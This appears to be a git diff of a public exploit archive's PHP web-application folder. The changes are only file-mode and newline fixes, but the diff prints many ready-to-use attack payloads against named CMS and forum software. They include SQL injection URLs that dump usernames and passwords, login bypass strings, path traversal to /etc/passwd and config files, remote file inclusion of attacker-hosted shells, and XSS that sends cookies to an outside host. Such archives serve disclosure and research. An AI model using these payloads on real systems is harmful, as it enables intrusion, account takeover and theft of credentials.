http://www.example.com/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2&topic_id=2&viewmode=flat&order=0 http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_pn -http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_sent_pn \ No newline at end of file +http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_sent_pn \ No newline at end of file diff --git a/platforms/php/webapps/26187.txt b/platforms/php/webapps/26187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26188.txt b/platforms/php/webapps/26188.txt old mode 100755 new mode 100644 index 02f3e3425..4e1a8549d --- a/platforms/php/webapps/26188.txt +++ b/platforms/php/webapps/26188.txt @@ -4,4 +4,4 @@ PostNuke is prone to multiple cross-site scripting vulnerabilities. These issues This can lead to theft of cookie-based authentication credentials, as well as other types of attacks. -http://www.example.com/PostNuke-0.760-RC4b/html/user.php?op=edituser&htmltext=<h1>xss \ No newline at end of file +http://www.example.com/PostNuke-0.760-RC4b/html/user.php?op=edituser&htmltext=<h1>xss \ No newline at end of file diff --git a/platforms/php/webapps/26189.txt b/platforms/php/webapps/26189.txt old mode 100755 new mode 100644 index a3695a883..8ba90c34a --- a/platforms/php/webapps/26189.txt +++ b/platforms/php/webapps/26189.txt @@ -4,4 +4,4 @@ PostNuke is prone to an SQL injection vulnerability. This issue is due to a lack Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/[DIR]/index.php?name=Downloads&req=viewdownload&cid=1&show=[SQL%20INJECTION] \ No newline at end of file +http://www.example.com/[DIR]/index.php?name=Downloads&req=viewdownload&cid=1&show=[SQL%20INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/26190.txt b/platforms/php/webapps/26190.txt old mode 100755 new mode 100644 index be1ce31df..ca747b605 --- a/platforms/php/webapps/26190.txt +++ b/platforms/php/webapps/26190.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary server-side script code a user can bypass admin check, calling this url: -http://www.example.com/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Source \ No newline at end of file +http://www.example.com/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Source \ No newline at end of file diff --git a/platforms/php/webapps/26191.txt b/platforms/php/webapps/26191.txt old mode 100755 new mode 100644 index 29da01dc7..ceafed378 --- a/platforms/php/webapps/26191.txt +++ b/platforms/php/webapps/26191.txt @@ -5,4 +5,4 @@ SaveWebPortal is prone to multiple remote file include vulnerabilities. These is An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. http://www.example.com/menu_dx.php?SITE_Path=http://www.example.com/[remote code]%00 -http://www.example.com/menu_sx.php?CONTENTS_Dir=http://www.example.com/[remote code]%00 \ No newline at end of file +http://www.example.com/menu_sx.php?CONTENTS_Dir=http://www.example.com/[remote code]%00 \ No newline at end of file diff --git a/platforms/php/webapps/26192.txt b/platforms/php/webapps/26192.txt old mode 100755 new mode 100644 index 4f2a4c228..ba609591f --- a/platforms/php/webapps/26192.txt +++ b/platforms/php/webapps/26192.txt @@ -62,4 +62,4 @@ http://www.example.com/saveweb/menu_sx.php?L_MENUSX_PasswordForgot="><script>ale http://www.example.com/saveweb/menu_sx.php?L_MENUSX_Logout="><script>alert(document.cookie)</script> http://www.example.com/saveweb/menu_sx.php?L_MENUSX_Contacts="><script>alert(document.cookie)</script> http://www.example.com/saveweb/menu_sx.php?L_MENUSX_Guestbook="><script>alert(document.cookie)</script> -http://www.example.com/saveweb/menu_sx.php?L_MENUSX_ContactUs="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/saveweb/menu_sx.php?L_MENUSX_ContactUs="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26193.txt b/platforms/php/webapps/26193.txt old mode 100755 new mode 100644 index a5e5d2d2d..e611de7b6 --- a/platforms/php/webapps/26193.txt +++ b/platforms/php/webapps/26193.txt @@ -10,4 +10,4 @@ http://www.example.com/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00 http://www.example.com/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00 http://www.example.com/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00 -http://www.example.com/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00 \ No newline at end of file +http://www.example.com/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00 \ No newline at end of file diff --git a/platforms/php/webapps/26197.txt b/platforms/php/webapps/26197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26199.txt b/platforms/php/webapps/26199.txt old mode 100755 new mode 100644 index 889132c01..889b3ac7b --- a/platforms/php/webapps/26199.txt +++ b/platforms/php/webapps/26199.txt @@ -4,4 +4,4 @@ phpMyAdmin is prone to a cross-site scripting vulnerability. This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the software. Such an attack would require that the victim follows a malicious link that includes hostile HTML and script code. -/error.php?error=%3Cscript%3Ewindow.alert('a')%3C/script%3E \ No newline at end of file +/error.php?error=%3Cscript%3Ewindow.alert('a')%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/2620.txt b/platforms/php/webapps/2620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26200.txt b/platforms/php/webapps/26200.txt old mode 100755 new mode 100644 index c3c817a96..b19c36266 --- a/platforms/php/webapps/26200.txt +++ b/platforms/php/webapps/26200.txt @@ -6,4 +6,4 @@ This may allow for various attacks including session hijacking due to the theft SqWebMail 5.0.4 is reportedly vulnerable to this issue. It is possible that other versions are affected as well. -<img src="cid:>" onError="alert(document.domain);"> \ No newline at end of file +<img src="cid:>" onError="alert(document.domain);"> \ No newline at end of file diff --git a/platforms/php/webapps/26201.txt b/platforms/php/webapps/26201.txt old mode 100755 new mode 100644 index 56017784a..2483965a5 --- a/platforms/php/webapps/26201.txt +++ b/platforms/php/webapps/26201.txt @@ -6,4 +6,4 @@ hpWebNotes is susceptible to a remote file include vulnerability. This issue is An attacker may exploit this issue to execute arbitrary PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id \ No newline at end of file +http://www.example.com/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id \ No newline at end of file diff --git a/platforms/php/webapps/26202.txt b/platforms/php/webapps/26202.txt old mode 100755 new mode 100644 index b7ed47831..f7101858f --- a/platforms/php/webapps/26202.txt +++ b/platforms/php/webapps/26202.txt @@ -10,4 +10,4 @@ http://www.example.com/[path]/footer.php?version[no]=<script>alert('lol')</scrip http://www.example.com/[path]/header.php?version[fullname]=<script>alert('lol')</script> http://www.example.com/[path]/header.php?version[no]=</title><script>alert('lol')</script> http://www.example.com/[path]/header.php?version[author]=--><script>alert('lol')</script> -http://www.example.com/[path]/header.php?version[email]=--><script>alert('lol')</script> \ No newline at end of file +http://www.example.com/[path]/header.php?version[email]=--><script>alert('lol')</script> \ No newline at end of file diff --git a/platforms/php/webapps/26203.php b/platforms/php/webapps/26203.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26205.txt b/platforms/php/webapps/26205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26206.txt b/platforms/php/webapps/26206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26207.txt b/platforms/php/webapps/26207.txt old mode 100755 new mode 100644 index 5b3964a07..8db45b16f --- a/platforms/php/webapps/26207.txt +++ b/platforms/php/webapps/26207.txt @@ -5,4 +5,4 @@ Land Down Under is prone to multiple SQL injection vulnerabilities. These issues Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/ldu/list.php?c='&s=title&w=asc&o=1&p=1 -http://www.example.com/ldu/list.php?c=%27&s=title&w=asc&o=1&p=1 \ No newline at end of file +http://www.example.com/ldu/list.php?c=%27&s=title&w=asc&o=1&p=1 \ No newline at end of file diff --git a/platforms/php/webapps/26208.txt b/platforms/php/webapps/26208.txt old mode 100755 new mode 100644 index 894a2e6e6..0790fef83 --- a/platforms/php/webapps/26208.txt +++ b/platforms/php/webapps/26208.txt @@ -4,4 +4,4 @@ AutoLinks Pro is prone to a remote file include vulnerability. This issue is due An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com//al_initialize.php?alpath=ftp://host.com/shell.php? \ No newline at end of file +http://www.example.com//al_initialize.php?alpath=ftp://host.com/shell.php? \ No newline at end of file diff --git a/platforms/php/webapps/26209.txt b/platforms/php/webapps/26209.txt old mode 100755 new mode 100644 index 8c452cd75..84753f4bc --- a/platforms/php/webapps/26209.txt +++ b/platforms/php/webapps/26209.txt @@ -5,4 +5,4 @@ PHP-Fusion is prone to a script injection vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. [URL=http://aaaaaa.com/UR[url=aa.com&&OnMouseOver=jscript:location='http://direct/to/cookie/stealer.com/?c='+cookie; -location="http://google.com]][/URL][/url] \ No newline at end of file +location="http://google.com]][/URL][/url] \ No newline at end of file diff --git a/platforms/php/webapps/2621.txt b/platforms/php/webapps/2621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26211.txt b/platforms/php/webapps/26211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26212.txt b/platforms/php/webapps/26212.txt old mode 100755 new mode 100644 index e4172fd72..7cea3b75d --- a/platforms/php/webapps/26212.txt +++ b/platforms/php/webapps/26212.txt @@ -6,4 +6,4 @@ An unauthorized user can retrieve arbitrary files by supplying directory travers Exploitation of this vulnerability could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible. -http://www.example.com/index.php?mod=read&id=../forum/users/[user].php%00 \ No newline at end of file +http://www.example.com/index.php?mod=read&id=../forum/users/[user].php%00 \ No newline at end of file diff --git a/platforms/php/webapps/26213.txt b/platforms/php/webapps/26213.txt old mode 100755 new mode 100644 index 09b42b40e..f116101f5 --- a/platforms/php/webapps/26213.txt +++ b/platforms/php/webapps/26213.txt @@ -41,5 +41,4 @@ EXPLOIT POC ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 -################################################################################################################ - \ No newline at end of file +################################################################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/26215.txt b/platforms/php/webapps/26215.txt old mode 100755 new mode 100644 index a1ff1174a..02c648032 --- a/platforms/php/webapps/26215.txt +++ b/platforms/php/webapps/26215.txt @@ -4,4 +4,4 @@ FlatNuke is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum/index.php?op=vis_reg&usr="><script>alert('LOL%20%20')</script><!-- \ No newline at end of file +http://www.example.com/forum/index.php?op=vis_reg&usr="><script>alert('LOL%20%20')</script><!-- \ No newline at end of file diff --git a/platforms/php/webapps/26217.html b/platforms/php/webapps/26217.html old mode 100755 new mode 100644 index 8750263ba..7e1b23d0f --- a/platforms/php/webapps/26217.html +++ b/platforms/php/webapps/26217.html @@ -11,4 +11,4 @@ example.html: <input type=hidden name=change_cms_lang value=vx> <input type=submit name=test VALUE="do it"> </form> -EOF \ No newline at end of file +EOF \ No newline at end of file diff --git a/platforms/php/webapps/2622.txt b/platforms/php/webapps/2622.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26223.txt b/platforms/php/webapps/26223.txt old mode 100755 new mode 100644 index 2b3948f3e..b4957acd8 --- a/platforms/php/webapps/26223.txt +++ b/platforms/php/webapps/26223.txt @@ -5,4 +5,4 @@ This issue is due to a failure in the application to properly sanitize user-supp Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. -<script>document.location="http://www.example.com/script?cookie="+escape(document.cookie)</script> \ No newline at end of file +<script>document.location="http://www.example.com/script?cookie="+escape(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26224.txt b/platforms/php/webapps/26224.txt old mode 100755 new mode 100644 index f27703649..d0273b1c0 --- a/platforms/php/webapps/26224.txt +++ b/platforms/php/webapps/26224.txt @@ -5,4 +5,4 @@ Unclassified NewsBoard is prone to an HTML injection vulnerability. This is due Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. post new message and paste into description field: -</div><script>alert(document.cookie)</script> \ No newline at end of file +</div><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26225.txt b/platforms/php/webapps/26225.txt old mode 100755 new mode 100644 index cf65c3f87..cf693d36b --- a/platforms/php/webapps/26225.txt +++ b/platforms/php/webapps/26225.txt @@ -20,4 +20,4 @@ see /etc/passwd file: http://www.example.com/upload/dl/[filename].inc?c=cat%20/etc/passwd see database username and password: -http://www.example.com/upload/dl/[filename].inc?c=cat%20.././config/md-config.php \ No newline at end of file +http://www.example.com/upload/dl/[filename].inc?c=cat%20.././config/md-config.php \ No newline at end of file diff --git a/platforms/php/webapps/26226.txt b/platforms/php/webapps/26226.txt old mode 100755 new mode 100644 index b31da5a63..16934f12c --- a/platforms/php/webapps/26226.txt +++ b/platforms/php/webapps/26226.txt @@ -7,4 +7,4 @@ An attacker may leverage any of these issues to have arbitrary script code execu http://www.example.com/modules.php?op=modload&name=subjects&file=print&print=<script>alert('LOL')</script> http://www.example.com/modules.php?op=modload&name=Messages&file=bb_smilies&sitename=</title><script>alert(LOL')</script> http://www.example.com/modules.php?op=modload&name=Messages&file=bbcode_ref&sitename=</title><script>alert(LOL')</script> -http://www.example.com/javascript/openwindow.php?hlpfile=")<html><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/javascript/openwindow.php?hlpfile=")<html><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26228.txt b/platforms/php/webapps/26228.txt old mode 100755 new mode 100644 index ab36c5e2a..b6cf651eb --- a/platforms/php/webapps/26228.txt +++ b/platforms/php/webapps/26228.txt @@ -15,4 +15,4 @@ of the http header as follows: Content-Disposition: form-data; name="icon"\r\n \r\n --1') [SQL] /*\r\n \ No newline at end of file +-1') [SQL] /*\r\n \ No newline at end of file diff --git a/platforms/php/webapps/26229.txt b/platforms/php/webapps/26229.txt old mode 100755 new mode 100644 index 0b1b28975..734bd779b --- a/platforms/php/webapps/26229.txt +++ b/platforms/php/webapps/26229.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/[path]/webadmin/login.php and use this: login: ' or isnull(1/0) /* -password: [nothing here] \ No newline at end of file +password: [nothing here] \ No newline at end of file diff --git a/platforms/php/webapps/26231.txt b/platforms/php/webapps/26231.txt old mode 100755 new mode 100644 index 4072ac066..63bcf95cb --- a/platforms/php/webapps/26231.txt +++ b/platforms/php/webapps/26231.txt @@ -4,4 +4,4 @@ PBLang is affected by a directory traversal vulnerability. This issue is due to Exploitation of this vulnerability could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible. -http://www.example.com/pblang/setcookie.php?u=../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/pblang/setcookie.php?u=../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/26232.txt b/platforms/php/webapps/26232.txt old mode 100755 new mode 100644 index ae9f6e178..7618297d3 --- a/platforms/php/webapps/26232.txt +++ b/platforms/php/webapps/26232.txt @@ -19,4 +19,4 @@ http://www.example.com/[path]/event.php?CeTi=</title><script>alert('LOL')</scrip http://www.example.com/[path]/event.php?Contact=<script>alert('LOL')</script> http://www.example.com/[path]/event.php?Description=<script>alert('LOL')</script> http://www.example.com/[path]/event.php?ShowAddress=<script>alert('LOL')</script> -http://www.example.com/[path]/week.php?font="><script>alert('LOL')</script> \ No newline at end of file +http://www.example.com/[path]/week.php?font="><script>alert('LOL')</script> \ No newline at end of file diff --git a/platforms/php/webapps/26234.txt b/platforms/php/webapps/26234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26235.txt b/platforms/php/webapps/26235.txt old mode 100755 new mode 100644 index cb8a4ffea..5e2d7548e --- a/platforms/php/webapps/26235.txt +++ b/platforms/php/webapps/26235.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/include_this/news.php?cat=[SQL] http://www.example.com/include_this/news.php?id=[SQL] -http://www.example.com/include_this/news.php?stof=[SQL] \ No newline at end of file +http://www.example.com/include_this/news.php?stof=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26236.txt b/platforms/php/webapps/26236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26237.txt b/platforms/php/webapps/26237.txt old mode 100755 new mode 100644 index 1d09b2283..1d22274bf --- a/platforms/php/webapps/26237.txt +++ b/platforms/php/webapps/26237.txt @@ -8,4 +8,4 @@ This issue may be leveraged to execute arbitrary server-side script code on an a aMember Pro 2.3.4 is reportedly affected, other versions may also be vulnerable. -config[root_dir]=http://example.com/evil.php? \ No newline at end of file +config[root_dir]=http://example.com/evil.php? \ No newline at end of file diff --git a/platforms/php/webapps/2624.txt b/platforms/php/webapps/2624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26240.txt b/platforms/php/webapps/26240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26241.txt b/platforms/php/webapps/26241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26243.txt b/platforms/php/webapps/26243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26244.txt b/platforms/php/webapps/26244.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26246.txt b/platforms/php/webapps/26246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26247.txt b/platforms/php/webapps/26247.txt old mode 100755 new mode 100644 index 75a9eab63..9516aeb72 --- a/platforms/php/webapps/26247.txt +++ b/platforms/php/webapps/26247.txt @@ -19,4 +19,4 @@ Successful exploitation could result in a compromise of the application, disclos <!-- start: gobutton --> <input type="submit" value="Go" /> <!-- end: gobutton --> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/26252.txt b/platforms/php/webapps/26252.txt old mode 100755 new mode 100644 index a5ff901d2..f9962aadc --- a/platforms/php/webapps/26252.txt +++ b/platforms/php/webapps/26252.txt @@ -7,4 +7,4 @@ Exploitation of this vulnerability could lead to a loss of confidentiality as ar Subscribe Me Pro 2.044.09P and prior are affected by this vulnerability. http://www.example.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20 -http://www.example.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/26253.txt b/platforms/php/webapps/26253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26254.txt b/platforms/php/webapps/26254.txt old mode 100755 new mode 100644 index f564a9c53..5d8279cc3 --- a/platforms/php/webapps/26254.txt +++ b/platforms/php/webapps/26254.txt @@ -4,4 +4,4 @@ Land Down Under is prone to multiple SQL injection vulnerabilities. These issues Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/plug.php?e=topitems';AND%20THIS=LAME \ No newline at end of file +http://www.example.com/plug.php?e=topitems';AND%20THIS=LAME \ No newline at end of file diff --git a/platforms/php/webapps/26255.php b/platforms/php/webapps/26255.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26257.txt b/platforms/php/webapps/26257.txt old mode 100755 new mode 100644 index 8d175e52b..5476b0b6f --- a/platforms/php/webapps/26257.txt +++ b/platforms/php/webapps/26257.txt @@ -8,4 +8,4 @@ go to http://www.example.com/atutor/password_reminder.php and in the email field type: -' UNION SELECT login, password, 'your_email@example.com' FROM AT_admins /* \ No newline at end of file +' UNION SELECT login, password, 'your_email@example.com' FROM AT_admins /* \ No newline at end of file diff --git a/platforms/php/webapps/26258.txt b/platforms/php/webapps/26258.txt old mode 100755 new mode 100644 index a0a3670dd..8b7c2a590 --- a/platforms/php/webapps/26258.txt +++ b/platforms/php/webapps/26258.txt @@ -6,4 +6,4 @@ A remote attacker can exploit this vulnerability and make repeated GET requests http://www.example.com/atutor/content/chat/2/msgs/1.message http://www.example.com/atutor/content/chat/2/msgs/2.message -http://www.example.com/atutor/content/chat/2/msgs/3.message \ No newline at end of file +http://www.example.com/atutor/content/chat/2/msgs/3.message \ No newline at end of file diff --git a/platforms/php/webapps/26259.txt b/platforms/php/webapps/26259.txt old mode 100755 new mode 100644 index 5bdef065f..cd5fdd57d --- a/platforms/php/webapps/26259.txt +++ b/platforms/php/webapps/26259.txt @@ -4,4 +4,4 @@ Noah's Classifieds is prone to an SQL injection vulnerability. This is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/classifieds/index.php?methode=showdetails&list=Advertisment&rollid=4' \ No newline at end of file +http://www.example.com/classifieds/index.php?methode=showdetails&list=Advertisment&rollid=4' \ No newline at end of file diff --git a/platforms/php/webapps/2626.txt b/platforms/php/webapps/2626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26260.txt b/platforms/php/webapps/26260.txt old mode 100755 new mode 100644 index 040dc4775..0cdc157cf --- a/platforms/php/webapps/26260.txt +++ b/platforms/php/webapps/26260.txt @@ -6,4 +6,4 @@ The revision control function of the TWikiUsers script uses the backtick shell m This attack would occur in the context of the vulnerable application and can facilitate unauthorized remote access. -http://www.example.com/cgi-bin/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd \ No newline at end of file +http://www.example.com/cgi-bin/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/26261.txt b/platforms/php/webapps/26261.txt old mode 100755 new mode 100644 index db171be87..286e83fa5 --- a/platforms/php/webapps/26261.txt +++ b/platforms/php/webapps/26261.txt @@ -5,4 +5,4 @@ Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/classifieds/index.php?methode=showdetails&list=Advertisment&rollid=4'<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/classifieds/index.php?methode=showdetails&list=Advertisment&rollid=4'<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26262.txt b/platforms/php/webapps/26262.txt old mode 100755 new mode 100644 index fa68bd606..3841dec31 --- a/platforms/php/webapps/26262.txt +++ b/platforms/php/webapps/26262.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos The following is sufficient to gain administrative privileges: login: " or isnull(1/0) /* -password: [whatever] \ No newline at end of file +password: [whatever] \ No newline at end of file diff --git a/platforms/php/webapps/26263.txt b/platforms/php/webapps/26263.txt old mode 100755 new mode 100644 index 6ef9221d0..2c1aa0bf0 --- a/platforms/php/webapps/26263.txt +++ b/platforms/php/webapps/26263.txt @@ -4,4 +4,4 @@ AEwebworks aeDating is prone to an SQL injection vulnerability. This is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0UNION \ No newline at end of file +http://www.example.com/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0UNION \ No newline at end of file diff --git a/platforms/php/webapps/26264.txt b/platforms/php/webapps/26264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26265.txt b/platforms/php/webapps/26265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26266.txt b/platforms/php/webapps/26266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26267.txt b/platforms/php/webapps/26267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26268.txt b/platforms/php/webapps/26268.txt old mode 100755 new mode 100644 index a439153c3..8212321bf --- a/platforms/php/webapps/26268.txt +++ b/platforms/php/webapps/26268.txt @@ -4,4 +4,4 @@ DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/newpost.php?sub=newthread&fid=[code] \ No newline at end of file +http://www.example.com/newpost.php?sub=newthread&fid=[code] \ No newline at end of file diff --git a/platforms/php/webapps/2627.txt b/platforms/php/webapps/2627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26270.txt b/platforms/php/webapps/26270.txt old mode 100755 new mode 100644 index f697ce748..e2ae01108 --- a/platforms/php/webapps/26270.txt +++ b/platforms/php/webapps/26270.txt @@ -17,4 +17,4 @@ aka %27);%3C/script%3E&site=impressum File Inclusion -------------- -http://www.example.com/index.php?show=[file]&cat=news_archiv&start=1 \ No newline at end of file +http://www.example.com/index.php?show=[file]&cat=news_archiv&start=1 \ No newline at end of file diff --git a/platforms/php/webapps/26272.txt b/platforms/php/webapps/26272.txt old mode 100755 new mode 100644 index 70edb1047..b704724a9 --- a/platforms/php/webapps/26272.txt +++ b/platforms/php/webapps/26272.txt @@ -4,4 +4,4 @@ EPay Pro is prone to a directory traversal vulnerability. This is due to a lack An unauthorized user can retrieve arbitrary files by supplying directory traversal strings '../' to the vulnerable parameter. Exploitation of this vulnerability could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible. -http://www.example.com/index.php?read=../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/index.php?read=../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/26273.txt b/platforms/php/webapps/26273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26274.txt b/platforms/php/webapps/26274.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26275.txt b/platforms/php/webapps/26275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26276.txt b/platforms/php/webapps/26276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26277.txt b/platforms/php/webapps/26277.txt old mode 100755 new mode 100644 index 7abef6b8c..b5dbe9747 --- a/platforms/php/webapps/26277.txt +++ b/platforms/php/webapps/26277.txt @@ -5,4 +5,4 @@ NooToplist is prone to multiple SQL injection vulnerabilities. These issues are Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/index.php?o='[SQL INJECTION] -http://www.example.com/index.php?sort='[SQL INJECTION] \ No newline at end of file +http://www.example.com/index.php?sort='[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/26278.txt b/platforms/php/webapps/26278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26279.txt b/platforms/php/webapps/26279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26280.txt b/platforms/php/webapps/26280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26281.txt b/platforms/php/webapps/26281.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26282.txt b/platforms/php/webapps/26282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26283.txt b/platforms/php/webapps/26283.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26284.txt b/platforms/php/webapps/26284.txt old mode 100755 new mode 100644 index afa9a44f2..b8fa40318 --- a/platforms/php/webapps/26284.txt +++ b/platforms/php/webapps/26284.txt @@ -6,4 +6,4 @@ Successful exploitation could allow an attacker to compromise the application, a http://www.example.com/index.php?mod=pages&idp='[SQL INJECTION] http://www.example.com/index.php?mod=pages&id_ctg='[SQL INJECTION] -http://www.example.com/index.php?mod=pages&id_prd='[SQL INJECTION] \ No newline at end of file +http://www.example.com/index.php?mod=pages&id_prd='[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/26285.txt b/platforms/php/webapps/26285.txt old mode 100755 new mode 100644 index 7cf9f4bf4..bcabf7a59 --- a/platforms/php/webapps/26285.txt +++ b/platforms/php/webapps/26285.txt @@ -30,4 +30,4 @@ Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive -Cookie: PHPSESSID=12345") <!-- Session ID --!> \ No newline at end of file +Cookie: PHPSESSID=12345") <!-- Session ID --!> \ No newline at 